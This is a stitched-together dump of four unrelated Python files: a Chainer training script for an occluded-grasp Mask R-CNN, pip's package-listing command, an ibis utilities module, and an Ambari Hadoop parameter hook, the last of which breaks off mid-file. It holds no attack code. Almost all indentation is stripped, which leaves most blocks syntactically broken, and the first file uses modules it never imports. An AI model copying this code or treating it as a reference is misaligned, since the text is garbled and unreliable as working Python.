from grasp_data_generator.datasets import OIDualarmGraspDatasetV1
from grasp_data_generator.datasets import OIDualarmGraspDatasetV2
from grasp_data_generator.datasets import OIRealAnnotatedDatasetV1
from grasp_data_generator.datasets import OIRealAnnotatedDatasetV2
from grasp_data_generator.extensions import ManualScheduler
from grasp_data_generator.models import OccludedGraspMaskRCNNResNet101
from grasp_data_generator.models import OccludedGraspMaskRCNNTrainChain
thisdir = osp.dirname(osp.abspath(__file__))
class Transform(object):
def __init__(self, occluded_mask_rcnn):
self.occluded_mask_rcnn = occluded_mask_rcnn
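    # ``in_data`` arrives as one of three tuples:
    #   (img, ins_label, label)
    #   (img, ins_label, label, sg_mask, dg_mask)
    #   (img, ins_label, label, sg_mask, dg_mask, rotation)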
def __call__(self, in_data):
if len(in_data) == 5:
img, ins_label, label, sg_mask, dg_mask = in_data
rotation = None
elif len(in_data) == 3:
img, ins_label, label = in_data
else:
img, ins_label, label, sg_mask, dg_mask, rotation = in_data
bbox = mask_to_bbox(ins_label != 0)
_, orig_H, orig_W = img.shape
img = self.occluded_mask_rcnn.prepare(img)
_, H, W = img.shape
scale = H / orig_H
ins_label = transforms.resize(ins_label, (H, W), PIL.Image.NEAREST)
bbox = transforms.resize_bbox(bbox, (orig_H, orig_W), (H, W))
if len(in_data) > 3:
sg_mask = transforms.resize(
sg_mask.astype(np.float32), (H, W))
dg_mask = transforms.resize(
dg_mask.astype(np.float32), (H, W))
if len(in_data) == 5:
return img, ins_label, label, bbox, scale, sg_mask, dg_mask
elif len(in_data) == 3:
return img, ins_label, label, bbox, scale
else:
return img, ins_label, label, bbox, scale, \
sg_mask, dg_mask, rotation
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--dataset', default='v2', help='Dataset version',
choices=['v1', 'v2', 'fv1', 'fv2', 'fv3', 'ev1', 'ev2'])
parser.add_argument('--gpu', '-g', type=int, help='GPU id.')
parser.add_argument('--multi-node', action='store_true',
help='use multi node')
parser.add_argument('--max-epoch', type=float,
default=12, help='epoch')
parser.add_argument('--seed', '-s', type=int, default=1234)
parser.add_argument('--lr-base', type=float,
default=0.0025, help='lr_base')
parser.add_argument('--pretrained-model', type=str, default=None)
parser.add_argument('--finetune', action='store_true',
help='use finetune node')
parser.add_argument('--no-grasp', action='store_true',
help='use no grasp node')
parser.add_argument('--alpha-graspable', type=float, default=0.05)
args = parser.parse_args()
if args.multi_node:
import chainermn
comm = chainermn.create_communicator('hierarchical')
device = comm.intra_rank
args.n_node = comm.inter_size
args.n_gpu = comm.size
chainer.cuda.get_device_from_id(device).use()
else:
args.n_node = 1
args.n_gpu = 1
chainer.cuda.get_device_from_id(args.gpu).use()
device = args.gpu
now = datetime.datetime.now()
random.seed(args.seed)
np.random.seed(args.seed)
# Default Config
# args.min_size = 800
# args.max_size = 1333
# args.anchor_scales = (2, 4, 8, 16, 32)
args.min_size = 600
args.max_size = 1000
args.anchor_scales = (4, 8, 16, 32)
args.rpn_dim = 512
if not args.multi_node or comm.rank == 0:
out = osp.join(thisdir, 'logs', now.strftime('%Y%m%d_%H%M%S.%f'))
else:
out = None
if args.multi_node:
args.out = comm.bcast_obj(out)
else:
args.out = out
del out
# 0.00125 * 8 = 0.01 in original
args.batch_size = 1 * args.n_gpu
args.lr_base = args.lr_base * args.batch_size
args.weight_decay = 0.0001
args.step_size = [2 / 3 * args.max_epoch, 8 / 9 * args.max_epoch]
# -------------------------------------------------------------------------
# Dataset
if args.dataset == 'v1':
args.rotate_angle = None
train_data = OIDualarmGraspDatasetV1(
split='train', return_rotation=False)
# test_data = OIDualarmGraspDatasetV1(split='test', imgaug=False)
elif args.dataset == 'v2':
args.rotate_angle = 30
train_data = OIDualarmGraspDatasetV2(
split='train', return_rotation=True)
# test_data = OIDualarmGraspDatasetV2(split='test', imgaug=False)
elif args.dataset == 'fv1':
args.rotate_angle = 30
train_data = FinetuningOIDualarmGraspDatasetV1(
split='train', return_rotation=True)
# test_data = FinetuningOIDualarmGraspDatasetV1(
# split='test', imgaug=False)
elif args.dataset == 'fv2':
args.rotate_angle = 30
train_data = FinetuningOIDualarmGraspDatasetV2(
split='train', return_rotation=True)
# test_data = FinetuningOIDualarmGraspDatasetV2(
# split='test', imgaug=False)
elif args.dataset == 'fv3':
args.rotate_angle = 30
train_data = FinetuningOIDualarmGraspDatasetV3(
split='train', return_rotation=True)
# test_data = FinetuningOIDualarmGraspDatasetV2(
# split='test', imgaug=False)
elif args.dataset == 'ev1':
args.rotate_angle = 30
train_data = OIRealAnnotatedDatasetV1(split='all', imgaug=True)
elif args.dataset == 'ev2':
args.rotate_angle = 30
train_data = OIRealAnnotatedDatasetV2(split='all', imgaug=True)
else:
raise ValueError(
'Given dataset is not supported: {}'.format(args.dataset))
label_names = train_data.label_names
# -------------------------------------------------------------------------
# Model + Optimizer.
occluded_grasp_mask_rcnn = OccludedGraspMaskRCNNResNet101(
n_fg_class=len(label_names),
anchor_scales=args.anchor_scales,
min_size=args.min_size,
max_size=args.max_size,
rpn_dim=args.rpn_dim,
rotate_angle=args.rotate_angle)
occluded_grasp_mask_rcnn.nms_thresh = 0.3
occluded_grasp_mask_rcnn.score_thresh = 0.05
if args.pretrained_model is not None:
chainer.serializers.load_npz(
osp.join(thisdir, args.pretrained_model), occluded_grasp_mask_rcnn)
if args.finetune:
assert not args.no_grasp
if args.no_grasp:
assert not args.finetune
args.grasp_branch_finetune = args.finetune
args.mask_branch_finetune = args.no_grasp
model = OccludedGraspMaskRCNNTrainChain(
occluded_grasp_mask_rcnn,
grasp_branch_finetune=args.grasp_branch_finetune,
alpha_graspable=args.alpha_graspable,
mask_branch_finetune=args.mask_branch_finetune)
if args.multi_node or args.gpu >= 0:
model.to_gpu()
optimizer = chainer.optimizers.MomentumSGD(momentum=0.9)
if args.multi_node:
optimizer = chainermn.create_multi_node_optimizer(optimizer, comm)
optimizer.setup(model)
optimizer.add_hook(chainer.optimizer.WeightDecay(rate=args.weight_decay))
occluded_grasp_mask_rcnn.extractor.conv1.disable_update()
occluded_grasp_mask_rcnn.extractor.bn1.disable_update()
occluded_grasp_mask_rcnn.extractor.res2.disable_update()
for link in occluded_grasp_mask_rcnn.links():
if isinstance(link, cmr.links.AffineChannel2D):
link.disable_update()
# -------------------------------------------------------------------------
# Transform dataset.
train_data = chainer.datasets.TransformDataset(
train_data, Transform(occluded_grasp_mask_rcnn))
# -------------------------------------------------------------------------
# Iterator.
if args.multi_node:
if comm.rank != 0:
train_data = None
train_data = chainermn.scatter_dataset(train_data, comm, shuffle=True)
# for training
train_iter = chainer.iterators.SerialIterator(train_data, batch_size=1)
# test_iter = chainer.iterators.SerialIterator(
# test_data, batch_size=1, repeat=False, shuffle=False)
# -------------------------------------------------------------------------
if occluded_grasp_mask_rcnn.rotate_angle is None:
converter = functools.partial(
cmr.datasets.concat_examples,
padding=0,
# img, ins_labels, labels, bboxes, sg_masks, dg_masks, scales
indices_concat=[0, 1, 2, 4, 5, 6],
# img, ins_labels, labels, _, sg_masks, dg_masks, scales
indices_to_device=[0, 3], # img, bbox
)
else:
converter = functools.partial(
cmr.datasets.concat_examples,
padding=0,
# img, ins_labels, labels, bboxes,
# sg_masks, dg_masks, scales, rotations
indices_concat=[0, 1, 2, 4, 5, 6, 7],
# img, ins_labels, labels, _,
# sg_masks, dg_masks, scales, rotations
indices_to_device=[0, 3], # img, bbox
)
updater = chainer.training.updater.StandardUpdater(
train_iter, optimizer, device=device,
converter=converter)
trainer = training.Trainer(
updater, (args.max_epoch, 'epoch'), out=args.out)
args.warm_up = not args.no_grasp
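    # Learning rate schedule: linear warm-up from lr_base / 3 over the first
    # 500 iterations (skipped with --no-grasp), then step decay to 0.1x and
    # 0.01x of lr_base at step_size[0] and step_size[1] epochs.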
def lr_schedule(updater):
warm_up_duration = 500
warm_up_rate = 1 / 3
iteration = updater.iteration
if args.warm_up and iteration < warm_up_duration:
rate = warm_up_rate \
+ (1 - warm_up_rate) * iteration / warm_up_duration
elif iteration < (args.step_size[0] * len(train_data)):
rate = 1
elif iteration < (args.step_size[1] * len(train_data)):
rate = 0.1
else:
rate = 0.01
return args.lr_base * rate
trainer.extend(ManualScheduler('lr', lr_schedule))
# eval_interval = 1, 'epoch'
log_interval = 20, 'iteration'
plot_interval = 0.1, 'epoch'
print_interval = 20, 'iteration'
if not args.multi_node or comm.rank == 0:
# evaluator = InstanceSegmentationVOCEvaluator(
# test_iter, model.occluded_grasp_mask_rcnn, device=device,
# use_07_metric=False, label_names=label_names)
# trainer.extend(evaluator, trigger=eval_interval)
# trainer.extend(
# extensions.snapshot_object(
# model.occluded_grasp_mask_rcnn, 'snapshot_model.npz'),
# trigger=training.triggers.MaxValueTrigger(
# 'validation/main/mpq', eval_interval))
model_name = model.occluded_grasp_mask_rcnn.__class__.__name__
trainer.extend(
chainer.training.extensions.snapshot_object(
model.occluded_grasp_mask_rcnn,
savefun=chainer.serializers.save_npz,
filename='%s_model_iter_{.updater.iteration}.npz'
% model_name),
trigger=(1, 'epoch'))
args.git_hash = cmr.utils.git_hash()
args.hostname = socket.gethostname()
trainer.extend(fcn.extensions.ParamsReport(args.__dict__))
# trainer.extend(
# InstanceSegmentationVisReport(
# test_iter, model.occluded_grasp_mask_rcnn,
# label_names=label_names),
# trigger=eval_interval)
trainer.extend(chainer.training.extensions.observe_lr(),
trigger=log_interval)
trainer.extend(extensions.LogReport(trigger=log_interval))
trainer.extend(extensions.PrintReport(
['iteration', 'epoch', 'elapsed_time', 'lr',
'main/loss',
'main/rpn_loc_loss',
'main/rpn_cls_loss',
'main/roi_loc_loss',
'main/roi_cls_loss',
'main/roi_mask_loss',
'main/roi_sg_mask_loss',
'main/roi_dg_mask_loss',
'validation/main/mpq']),
trigger=print_interval,
)
trainer.extend(extensions.ProgressBar(update_interval=10))
# plot
assert extensions.PlotReport.available()
trainer.extend(
extensions.PlotReport(
['main/loss',
'main/rpn_loc_loss',
'main/rpn_cls_loss',
'main/roi_loc_loss',
'main/roi_cls_loss',
'main/roi_mask_loss',
'main/roi_sg_mask_loss',
'main/roi_dg_mask_loss'],
file_name='loss.png', trigger=plot_interval,
),
trigger=plot_interval,
)
# trainer.extend(
# extensions.PlotReport(
# ['validation/main/map',
# 'validation/main/msq',
# 'validation/main/mdq',
# 'validation/main/mpq'],
# file_name='accuracy.png', trigger=plot_interval
# ),
# trigger=eval_interval,
# )
trainer.extend(extensions.dump_graph('main/loss'))
trainer.run()
if __name__ == '__main__':
main()
|
|
from __future__ import absolute_import
import json
import logging
import warnings
from pip._vendor import six
from pip._vendor.six.moves import zip_longest
from pip._internal.basecommand import Command
from pip._internal.cmdoptions import index_group, make_option_group
from pip._internal.exceptions import CommandError
from pip._internal.index import PackageFinder
from pip._internal.utils.deprecation import RemovedInPip11Warning
from pip._internal.utils.misc import (
dist_is_editable, get_installed_distributions,
)
from pip._internal.utils.packaging import get_installer
logger = logging.getLogger(__name__)
class ListCommand(Command):
"""
List installed packages, including editables.
Packages are listed in a case-insensitive sorted order.
"""
name = 'list'
usage = """
%prog [options]"""
summary = 'List installed packages.'
def __init__(self, *args, **kw):
super(ListCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(
'-o', '--outdated',
action='store_true',
default=False,
help='List outdated packages')
cmd_opts.add_option(
'-u', '--uptodate',
action='store_true',
default=False,
help='List uptodate packages')
cmd_opts.add_option(
'-e', '--editable',
action='store_true',
default=False,
help='List editable projects.')
cmd_opts.add_option(
'-l', '--local',
action='store_true',
default=False,
help=('If in a virtualenv that has global access, do not list '
'globally-installed packages.'),
)
self.cmd_opts.add_option(
'--user',
dest='user',
action='store_true',
default=False,
help='Only output packages installed in user-site.')
cmd_opts.add_option(
'--pre',
action='store_true',
default=False,
help=("Include pre-release and development versions. By default, "
"pip only finds stable versions."),
)
cmd_opts.add_option(
'--format',
action='store',
dest='list_format',
default="columns",
choices=('legacy', 'columns', 'freeze', 'json'),
help="Select the output format among: columns (default), freeze, "
"json, or legacy.",
)
cmd_opts.add_option(
'--not-required',
action='store_true',
dest='not_required',
help="List packages that are not dependencies of "
"installed packages.",
)
cmd_opts.add_option(
'--exclude-editable',
action='store_false',
dest='include_editable',
            help='Exclude editable packages from output.',
)
cmd_opts.add_option(
'--include-editable',
action='store_true',
dest='include_editable',
            help='Include editable packages in output.',
default=True,
)
index_opts = make_option_group(index_group, self.parser)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def _build_package_finder(self, options, index_urls, session):
"""
Create a package finder appropriate to this list command.
"""
return PackageFinder(
find_links=options.find_links,
index_urls=index_urls,
allow_all_prereleases=options.pre,
trusted_hosts=options.trusted_hosts,
process_dependency_links=options.process_dependency_links,
session=session,
)
def run(self, options, args):
if options.list_format == "legacy":
warnings.warn(
"The legacy format has been deprecated and will be removed "
"in the future.",
RemovedInPip11Warning,
)
if options.outdated and options.uptodate:
raise CommandError(
"Options --outdated and --uptodate cannot be combined.")
packages = get_installed_distributions(
local_only=options.local,
user_only=options.user,
editables_only=options.editable,
include_editables=options.include_editable,
)
if options.outdated:
packages = self.get_outdated(packages, options)
elif options.uptodate:
packages = self.get_uptodate(packages, options)
if options.not_required:
packages = self.get_not_required(packages, options)
self.output_package_listing(packages, options)
def get_outdated(self, packages, options):
return [
dist for dist in self.iter_packages_latest_infos(packages, options)
if dist.latest_version > dist.parsed_version
]
def get_uptodate(self, packages, options):
return [
dist for dist in self.iter_packages_latest_infos(packages, options)
if dist.latest_version == dist.parsed_version
]
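    # "Not required" means no other installed distribution lists the
    # package among its requirements.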
def get_not_required(self, packages, options):
dep_keys = set()
for dist in packages:
dep_keys.update(requirement.key for requirement in dist.requires())
return {pkg for pkg in packages if pkg.key not in dep_keys}
def iter_packages_latest_infos(self, packages, options):
index_urls = [options.index_url] + options.extra_index_urls
if options.no_index:
logger.debug('Ignoring indexes: %s', ','.join(index_urls))
index_urls = []
dependency_links = []
for dist in packages:
if dist.has_metadata('dependency_links.txt'):
dependency_links.extend(
dist.get_metadata_lines('dependency_links.txt'),
)
with self._build_session(options) as session:
finder = self._build_package_finder(options, index_urls, session)
finder.add_dependency_links(dependency_links)
for dist in packages:
typ = 'unknown'
all_candidates = finder.find_all_candidates(dist.key)
if not options.pre:
# Remove prereleases
all_candidates = [candidate for candidate in all_candidates
if not candidate.version.is_prerelease]
if not all_candidates:
continue
best_candidate = max(all_candidates,
key=finder._candidate_sort_key)
remote_version = best_candidate.version
if best_candidate.location.is_wheel:
typ = 'wheel'
else:
typ = 'sdist'
# This is dirty but makes the rest of the code much cleaner
dist.latest_version = remote_version
dist.latest_filetype = typ
yield dist
def output_legacy(self, dist, options):
if options.verbose >= 1:
return '%s (%s, %s, %s)' % (
dist.project_name,
dist.version,
dist.location,
get_installer(dist),
)
elif dist_is_editable(dist):
return '%s (%s, %s)' % (
dist.project_name,
dist.version,
dist.location,
)
else:
return '%s (%s)' % (dist.project_name, dist.version)
def output_legacy_latest(self, dist, options):
return '%s - Latest: %s [%s]' % (
self.output_legacy(dist, options),
dist.latest_version,
dist.latest_filetype,
)
def output_package_listing(self, packages, options):
packages = sorted(
packages,
key=lambda dist: dist.project_name.lower(),
)
if options.list_format == 'columns' and packages:
data, header = format_for_columns(packages, options)
self.output_package_listing_columns(data, header)
elif options.list_format == 'freeze':
for dist in packages:
if options.verbose >= 1:
logger.info("%s==%s (%s)", dist.project_name,
dist.version, dist.location)
else:
logger.info("%s==%s", dist.project_name, dist.version)
elif options.list_format == 'json':
logger.info(format_for_json(packages, options))
elif options.list_format == "legacy":
for dist in packages:
if options.outdated:
logger.info(self.output_legacy_latest(dist, options))
else:
logger.info(self.output_legacy(dist, options))
def output_package_listing_columns(self, data, header):
# insert the header first: we need to know the size of column names
if len(data) > 0:
data.insert(0, header)
pkg_strings, sizes = tabulate(data)
# Create and add a separator.
if len(data) > 0:
pkg_strings.insert(1, " ".join(map(lambda x: '-' * x, sizes)))
for val in pkg_strings:
logger.info(val)
def tabulate(vals):
# From pfmoore on GitHub:
# https://github.com/pypa/pip/issues/3651#issuecomment-216932564
assert len(vals) > 0
sizes = [0] * max(len(x) for x in vals)
for row in vals:
sizes = [max(s, len(str(c))) for s, c in zip_longest(sizes, row)]
result = []
for row in vals:
display = " ".join([str(c).ljust(s) if c is not None else ''
for s, c in zip_longest(sizes, row)])
result.append(display)
return result, sizes
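# Illustrative example:
#   tabulate([["Package", "Version"], ["pip", "9.0.1"]])
#   -> (['Package Version', 'pip     9.0.1  '], [7, 7])
# (cells are left-justified, so shorter cells keep trailing padding)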
def format_for_columns(pkgs, options):
"""
Convert the package data into something usable
by output_package_listing_columns.
"""
running_outdated = options.outdated
# Adjust the header for the `pip list --outdated` case.
if running_outdated:
header = ["Package", "Version", "Latest", "Type"]
else:
header = ["Package", "Version"]
data = []
if options.verbose >= 1 or any(dist_is_editable(x) for x in pkgs):
header.append("Location")
if options.verbose >= 1:
header.append("Installer")
for proj in pkgs:
# if we're working on the 'outdated' list, separate out the
# latest_version and type
row = [proj.project_name, proj.version]
if running_outdated:
row.append(proj.latest_version)
row.append(proj.latest_filetype)
if options.verbose >= 1 or dist_is_editable(proj):
row.append(proj.location)
if options.verbose >= 1:
row.append(get_installer(proj))
data.append(row)
return data, header
def format_for_json(packages, options):
data = []
for dist in packages:
info = {
'name': dist.project_name,
'version': six.text_type(dist.version),
}
if options.verbose >= 1:
info['location'] = dist.location
info['installer'] = get_installer(dist)
if options.outdated:
info['latest_version'] = six.text_type(dist.latest_version)
info['latest_filetype'] = dist.latest_filetype
data.append(info)
return json.dumps(data)
|
|
from __future__ import print_function
import collections
import functools
import logging
import operator
import os
import types
import six
import toolz
import ibis.compat as compat
from ibis.config import options
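# guid() prefers uuid4_hex from the optional ibis.comms extension and falls
# back to the standard library ``uuid`` module when it is not importable.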
def guid():
try:
from ibis.comms import uuid4_hex
return uuid4_hex()
except ImportError:
from uuid import uuid4
guid = uuid4()
return guid.hex if not compat.PY2 else guid.get_hex()
def indent(text, spaces):
prefix = ' ' * spaces
return ''.join(prefix + line for line in text.splitlines(True))
def is_one_of(values, t):
return (isinstance(x, t) for x in values)
any_of = toolz.compose(any, is_one_of)
all_of = toolz.compose(all, is_one_of)
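# any_of(values, t) / all_of(values, t): True when any / all of ``values``
# are instances of ``t``.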
def promote_list(val):
if not isinstance(val, list):
val = [val]
return val
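# IbisSet and IbisMap are list-backed containers whose membership tests use
# the elements' structural ``equals`` method instead of hashing.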
class IbisSet(object):
def __init__(self, keys=None):
self.keys = keys or []
@classmethod
def from_list(cls, keys):
return IbisSet(keys)
def __contains__(self, obj):
for other in self.keys:
if obj.equals(other):
return True
return False
def add(self, obj):
self.keys.append(obj)
class IbisMap(object):
def __init__(self):
self.keys = []
self.values = []
def __contains__(self, obj):
for other in self.keys:
if obj.equals(other):
return True
return False
def set(self, key, value):
self.keys.append(key)
self.values.append(value)
def get(self, key):
for k, v in zip(self.keys, self.values):
if key.equals(k):
return v
raise KeyError(key)
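# Illustrative sketch of IbisSet/IbisMap usage; membership is decided by
# structural `.equals()` rather than hashing (`Key` is a hypothetical class):
#     >>> class Key(object):
#     ...     def __init__(self, n):
#     ...         self.n = n
#     ...     def equals(self, other):
#     ...         return self.n == other.n
#     >>> m = IbisMap()
#     >>> m.set(Key(1), 'a')
#     >>> Key(1) in m
#     True
#     >>> m.get(Key(1))
#     'a'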
def is_function(v):
return isinstance(v, (types.FunctionType, types.LambdaType))
def adjoin(space, *lists):
"""
    Glue together several lists of strings as columns, separated by the
    requested amount of space. The idea is to prettify output.
    Brought over from pandas.
"""
out_lines = []
newLists = []
lengths = [max(map(len, x)) + space for x in lists[:-1]]
    # the last column gets no trailing padding
lengths.append(max(map(len, lists[-1])))
maxLen = max(map(len, lists))
for i, lst in enumerate(lists):
nl = [x.ljust(lengths[i]) for x in lst]
nl.extend([' ' * lengths[i]] * (maxLen - len(lst)))
newLists.append(nl)
toJoin = zip(*newLists)
for lines in toJoin:
out_lines.append(_join_unicode(lines))
return _join_unicode(out_lines, sep='\n')
def _join_unicode(lines, sep=''):
try:
return sep.join(lines)
except UnicodeDecodeError:
sep = compat.unicode_type(sep)
return sep.join([x.decode('utf-8') if isinstance(x, str) else x
for x in lines])
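# Example of `adjoin` output (each positional argument is one column):
#     >>> adjoin(2, ['a', 'bb'], ['ccc', 'd']).split('\n')
#     ['a   ccc', 'bb  d  ']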
def log(msg):
if options.verbose:
(options.verbose_log or print)(msg)
def approx_equal(a, b, eps):
"""Return whether the difference between `a` and `b` is less than `eps`.
Parameters
----------
a : numbers.Real
b : numbers.Real
eps : numbers.Real
Returns
-------
are_diff : bool
"""
assert abs(a - b) < eps
def implements(f):
# TODO: is this any different from functools.wraps?
def decorator(g):
g.__doc__ = f.__doc__
return g
return decorator
def safe_index(elements, value):
"""Find the location of `value` in `elements`, return -1 if `value` is
not found instead of raising ``ValueError``.
Parameters
----------
elements : Sequence
value : object
Returns
-------
location : object
Examples
--------
>>> sequence = [1, 2, 3]
>>> safe_index(sequence, 2)
1
>>> safe_index(sequence, 4)
-1
"""
try:
return elements.index(value)
except ValueError:
return -1
def is_iterable(o):
"""Return whether `o` is a non-string iterable.
Parameters
----------
o : object
Any python object
Returns
-------
is_seq : bool
Examples
--------
>>> x = '1'
>>> is_iterable(x)
False
>>> is_iterable(iter(x))
True
>>> is_iterable(i for i in range(1))
True
>>> is_iterable(1)
False
>>> is_iterable([])
True
"""
return (not isinstance(o, six.string_types) and
isinstance(o, collections.Iterable))
def convert_unit(value, unit, to):
"""Convert `value`--which is assumed to be in units of `unit`--to units of
`to`.
    Parameters
    ----------
    value : Union[numbers.Real, ibis.expr.types.NumericValue]
    unit : str
        The unit `value` is currently expressed in.
    to : str
        The unit to convert `value` into.
Returns
-------
result : Union[numbers.Integral, ibis.expr.types.NumericValue]
Examples
--------
>>> one_second = 1000
>>> x = convert_unit(one_second, 'ms', 's')
>>> x
1
>>> one_second = 1
>>> x = convert_unit(one_second, 's', 'ms')
>>> x
1000
>>> x = convert_unit(one_second, 's', 's')
>>> x
1
>>> x = convert_unit(one_second, 's', 'M')
Traceback (most recent call last):
...
ValueError: Cannot convert to or from variable length interval
"""
# Don't do anything if from and to units are equivalent
if unit == to:
return value
units = ('W', 'D', 'h', 'm', 's', 'ms', 'us', 'ns')
factors = (7, 24, 60, 60, 1000, 1000, 1000)
monthly_units = ('Y', 'Q', 'M')
monthly_factors = (4, 3)
try:
i, j = units.index(unit), units.index(to)
except ValueError:
try:
i, j = monthly_units.index(unit), monthly_units.index(to)
factors = monthly_factors
except ValueError:
raise ValueError(
'Cannot convert to or from variable length interval'
)
factor = functools.reduce(operator.mul, factors[min(i, j):max(i, j)], 1)
assert factor > 1
if i < j:
return value * factor
assert i > j
return value // factor
def get_logger(name, level=None, format=None, propagate=False):
logging.basicConfig()
handler = logging.StreamHandler()
if format is None:
format = (
'%(relativeCreated)6d '
'%(name)-20s '
'%(levelname)-8s '
'%(threadName)-25s '
'%(message)s'
)
handler.setFormatter(logging.Formatter(fmt=format))
logger = logging.getLogger(name)
logger.propagate = propagate
logger.setLevel(
level or getattr(
logging, os.environ.get('LOGLEVEL', 'WARNING').upper()))
logger.addHandler(handler)
return logger
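# Typical usage (sketch; the level may also come from the LOGLEVEL
# environment variable as handled above):
#     >>> demo_logger = get_logger('ibis.demo', level=logging.INFO)
#     >>> demo_logger.warning('something happened')  # doctest: +SKIP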
|
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import collections
import re
import os
import ambari_simplejson as json  # simplejson is much faster than the Python 2.6 json module and provides the same set of functions.
from resource_management.libraries.script import Script
from resource_management.libraries.functions import default
from resource_management.libraries.functions import format
from resource_management.libraries.functions import conf_select
from resource_management.libraries.functions import stack_select
from resource_management.libraries.functions import format_jvm_option
from resource_management.libraries.functions.is_empty import is_empty
from resource_management.libraries.functions.version import format_stack_version
from resource_management.libraries.functions.version import compare_versions
from resource_management.libraries.functions.expect import expect
from ambari_commons.os_check import OSCheck
from ambari_commons.constants import AMBARI_SUDO_BINARY
config = Script.get_config()
tmp_dir = Script.get_tmp_dir()
dfs_type = default("/commandParams/dfs_type", "")
artifact_dir = format("{tmp_dir}/AMBARI-artifacts/")
jdk_name = default("/hostLevelParams/jdk_name", None)
java_home = config['hostLevelParams']['java_home']
java_version = expect("/hostLevelParams/java_version", int)
jdk_location = config['hostLevelParams']['jdk_location']
sudo = AMBARI_SUDO_BINARY
ambari_server_hostname = config['clusterHostInfo']['ambari_server_host'][0]
stack_version_unformatted = config['hostLevelParams']['stack_version']
stack_version_formatted = format_stack_version(stack_version_unformatted)
restart_type = default("/commandParams/restart_type", "")
version = default("/commandParams/version", None)
# Handle upgrade and downgrade
if (restart_type.lower() == "rolling_upgrade" or restart_type.lower() == "nonrolling_upgrade") and version:
stack_version_formatted = format_stack_version(version)
security_enabled = config['configurations']['cluster-env']['security_enabled']
hdfs_user = config['configurations']['hadoop-env']['hdfs_user']
# Some datanode settings
dfs_dn_addr = default('/configurations/hdfs-site/dfs.datanode.address', None)
dfs_dn_http_addr = default('/configurations/hdfs-site/dfs.datanode.http.address', None)
dfs_dn_https_addr = default('/configurations/hdfs-site/dfs.datanode.https.address', None)
dfs_http_policy = default('/configurations/hdfs-site/dfs.http.policy', None)
secure_dn_ports_are_in_use = False
def get_port(address):
"""
  Extract the port number from an address such as 0.0.0.0:1019.
"""
if address is None:
return None
m = re.search(r'(?:http(?:s)?://)?([\w\d.]*):(\d{1,5})', address)
if m is not None:
return int(m.group(2))
else:
return None
def is_secure_port(port):
"""
  Return True if the port is privileged (root-owned, i.e. below 1024) on *nix systems.
"""
if port is not None:
return port < 1024
else:
return False
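# Illustration of the two helpers above (addresses are hypothetical):
#     >>> get_port('0.0.0.0:1019')
#     1019
#     >>> is_secure_port(get_port('0.0.0.0:1019'))
#     True
#     >>> is_secure_port(get_port('0.0.0.0:50010'))
#     False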
# hadoop default params
mapreduce_libs_path = "/usr/lib/hadoop-mapreduce/*"
# upgrades would cause these directories to have a version instead of "current"
# which would cause a lot of problems when writing out hadoop-env.sh; instead
# force the use of "current" in the hook
hadoop_home = stack_select.get_hadoop_dir("home", force_latest_on_upgrade=True)
hadoop_libexec_dir = stack_select.get_hadoop_dir("libexec", force_latest_on_upgrade=True)
hadoop_conf_empty_dir = "/etc/hadoop/conf.empty"
hadoop_secure_dn_user = hdfs_user
hadoop_dir = "/etc/hadoop"
versioned_stack_root = '/usr/iop/current'
hadoop_java_io_tmpdir = os.path.join(tmp_dir, "hadoop_java_io_tmpdir")
datanode_max_locked_memory = config['configurations']['hdfs-site']['dfs.datanode.max.locked.memory']
is_datanode_max_locked_memory_set = not is_empty(datanode_max_locked_memory)
# IOP 4.0+ params
if Script.is_stack_greater_or_equal("4.0"):
mapreduce_libs_path = "/usr/iop/current/hadoop-mapreduce-client/*"
# not supported in IOP 4.0+
hadoop_conf_empty_dir = None
if not security_enabled:
hadoop_secure_dn_user = '""'
else:
dfs_dn_port = get_port(dfs_dn_addr)
dfs_dn_http_port = get_port(dfs_dn_http_addr)
dfs_dn_https_port = get_port(dfs_dn_https_addr)
  # Avoid the datanode failing to start as a non-root user because it binds root-owned (privileged) ports.
if dfs_http_policy == "HTTPS_ONLY":
secure_dn_ports_are_in_use = is_secure_port(dfs_dn_port) or is_secure_port(dfs_dn_https_port)
elif dfs_http_policy == "HTTP_AND_HTTPS":
secure_dn_ports_are_in_use = is_secure_port(dfs_dn_port) or is_secure_port(dfs_dn_http_port) or is_secure_port(dfs_dn_https_port)
else: # params.dfs_http_policy == "HTTP_ONLY" or not defined:
secure_dn_ports_are_in_use = is_secure_port(dfs_dn_port) or is_secure_port(dfs_dn_http_port)
if secure_dn_ports_are_in_use:
hadoop_secure_dn_user = hdfs_user
else:
hadoop_secure_dn_user = '""'
#hadoop params
hdfs_log_dir_prefix = config['configurations']['hadoop-env']['hdfs_log_dir_prefix']
hadoop_pid_dir_prefix = config['configurations']['hadoop-env']['hadoop_pid_dir_prefix']
hadoop_root_logger = config['configurations']['hadoop-env']['hadoop_root_logger']
jsvc_path = "/usr/lib/bigtop-utils"
hadoop_heapsize = config['configurations']['hadoop-env']['hadoop_heapsize']
namenode_heapsize = config['configurations']['hadoop-env']['namenode_heapsize']
namenode_opt_newsize = config['configurations']['hadoop-env']['namenode_opt_newsize']
namenode_opt_maxnewsize = config['configurations']['hadoop-env']['namenode_opt_maxnewsize']
namenode_opt_permsize = format_jvm_option("/configurations/hadoop-env/namenode_opt_permsize","128m")
namenode_opt_maxpermsize = format_jvm_option("/configurations/hadoop-env/namenode_opt_maxpermsize","256m")
jtnode_opt_newsize = "200m"
jtnode_opt_maxnewsize = "200m"
jtnode_heapsize = "1024m"
ttnode_heapsize = "1024m"
dtnode_heapsize = config['configurations']['hadoop-env']['dtnode_heapsize']
nfsgateway_heapsize = config['configurations']['hadoop-env']['nfsgateway_heapsize']
mapred_pid_dir_prefix = default("/configurations/mapred-env/mapred_pid_dir_prefix","/var/run/hadoop-mapreduce")
mapred_log_dir_prefix = default("/configurations/mapred-env/mapred_log_dir_prefix","/var/log/hadoop-mapreduce")
hadoop_env_sh_template = config['configurations']['hadoop-env']['content']
#users and groups
